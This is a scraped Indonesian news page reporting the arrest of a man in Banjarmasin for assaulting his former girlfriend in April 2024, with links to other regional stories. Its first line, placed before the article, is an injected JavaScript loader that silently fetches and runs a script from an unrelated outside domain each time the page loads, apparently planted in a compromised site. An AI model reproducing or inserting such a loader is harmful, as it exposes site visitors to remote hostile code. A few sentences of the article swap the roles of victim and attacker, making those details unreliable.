(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kriminal Banjarmasin

Tendang Mantan Pacar, Lelaki di Banjarmasin Ditangkap Polisi


KANALKALIMANTAN.COM, BANJARMASIN – Seorang laki-laki berinisial EF (26) di Kota Banjarmasin ditahan polisi karena melakukan penganiayaan terhadap seorang perempuan.

Warga Kelurahan Belitung Darat Kecamatan Banjarmasin Barat itu ditangkap polisi setelah menganiaya UK (20) -mantan pacar EF-.

Kapolsek Banjarmasin Barat Kompol Aries Munandar melalui Kanit Reskrim Iptu Firuza Bahri mengatakan, penganiayaan terjadi pada Sabtu (13/4/2024) sekitar pukul 01.00 Wita di sebuah rumah kontrakan Jalan Belitung Darat, Gang 17 Juli, Kelurahan Kuin Cerucuk, Kecamatan Banjarmasin Barat, Kota Banjarmasin, Kalimantan Selatan.

Polisi membeber, motif penganiayaan itu terjadi lantaran EF sakit hati dengan UK karena tidak mau diajak balikan setelah putus pacaran.

Baca juga: Hujan-hujanan, Bocah di Banjarbaru Meninggal Dunia di Selokan Sempit Depan Rumah

Sabtu (13/4/2024) malam, UK merasa tidak enak badan dan meminta tolong kepada temannya S untuk mengantar berobat, namun ketika S datang, UK ternyata sudah minum obat.

Kemudian UK minta tolong kembali untuk diantar membeli makanan dan menarik uang dari aplikasi DANA di sebuah toko ponsel.

Sepulang dari toko ponsel dan tiba di rumah kontrakan, EF datang marah-marah dengan mengatakan kepada UK “Hanyar ampihan lawan aku sudah lawan lakian lain (baru putus dengan saya, sudah dengan lelaki lain)”.

S teman UK yang saat itu masih di kontarkan UK disuruh untuk pergi, sementara EF mengikuti UK masuk ke dalam rumahnya. Saat keduanya berada di dalam rumah kontrakan itulah penganiayaan terjadi.

Baca juga: Kapuas Expo 2024, Ini Kata Pj Bupati Erlin Hardi

“Saat itu EF masih ingin berpacaran dengan UK, tetapi UK tidak mau lagi pacaran kembali,” kata Kanit Reskrim Polsek Banjarmasin Barat.

Masih lanjut Kanit Reskrim, UK yang merasa kesal dengan mantan pacar langsung memukulnya menggunakan tangan kosong ke arah muka.

Meski UK sempat menangkis pukulan, tapi karena kalah kuat tubuhnya jatuh terlentang.

Tak sampai disitu, EF kemudian menarik tangan UK dan menyeretnya sambil menendang-nendang tubuh EF.

“EF berhenti menganiaya ketika warga dan Ketua RT setempat datang untuk melerai. Saat itu teman UK perempuan juga ikut melerai,” ujarnya.

Baca juga: Apel Besar dan Halalbihalal, Sekda Kapuas: Tingkatkan Disiplin ASN

Setelah kejadian itu, UK kata Kaniteskrim langsung melaporkan kejadian penganiayaan yang menimpanya tersebut ke Polsek Banjarmasin Barat.

Polisi langsung melakukan penyelidikan dan berhasil meringkus EF di kediamannya pada Rabu (17/4/2024). Polisi telah mengantongi barang bukti hasil VER atau Rontgen korban.

“Saat ini tersangka berada di Polsek Banjarmasin Barat dan atas perbuatannya ia terancam Pasal 351 KUHP tentang penganiayaan,” pungkas Iptu Firuza. (Kanalkalimantan.com/rizki)

Reporter: rizki
Editor: bie


Risa

Recent Posts

Peternakan Babi Dekat Kampus UIN Antasari di Guntung Manggis Dikeluhkan

Pemilik Ternak Diminta Datang ke Kantor Satpol PP Banjarbaru Read More

6 jam ago

Rekayasa Pemasangan ATSC, Jalan Pangeran Suriansyah Steril Parkir dan PKL

KANALKALIMANTAN.COM, BANJARBARU - Kawasan pinggir jalan maupun median di Jalan Pangeran Suriansyah, Kota Banjarbaru, Kalimantan… Read More

8 jam ago

Pj Bupati HSU Resmikan TMMD ke-120 di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan secara resmi membuka… Read More

9 jam ago

Sekat Bakar Antisipasi Karhutla Ring 1 Bandara Syamsudin Noor

KANALKALIMANTAN.COM, BANJARBARU - Provinsi Kalimantan Selatan kembali memfokuskan penanganan ancaman kebakaran hutan dan lahan (Karhutla)… Read More

9 jam ago

Buaya di Pelambuan Banjarmasin Gagal Ditangkap, Tiga Kali Terlihat Warga Muncul

KANALKALIMANTAN.COM, BANJARMASIN - Kemunculan seekor buaya di kawasan sungai Kelurahan Pelambuan, Kecamatan Banjarmasin Utara, Kota… Read More

12 jam ago

Ambulans Baru Layanan Puskesmas Keliling di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Dinas Kesehatan (Dinkes) Kota Banjarbaru hadirkan layanan kesehatan yang lebih dekat dengan… Read More

13 jam ago

This website uses cookies.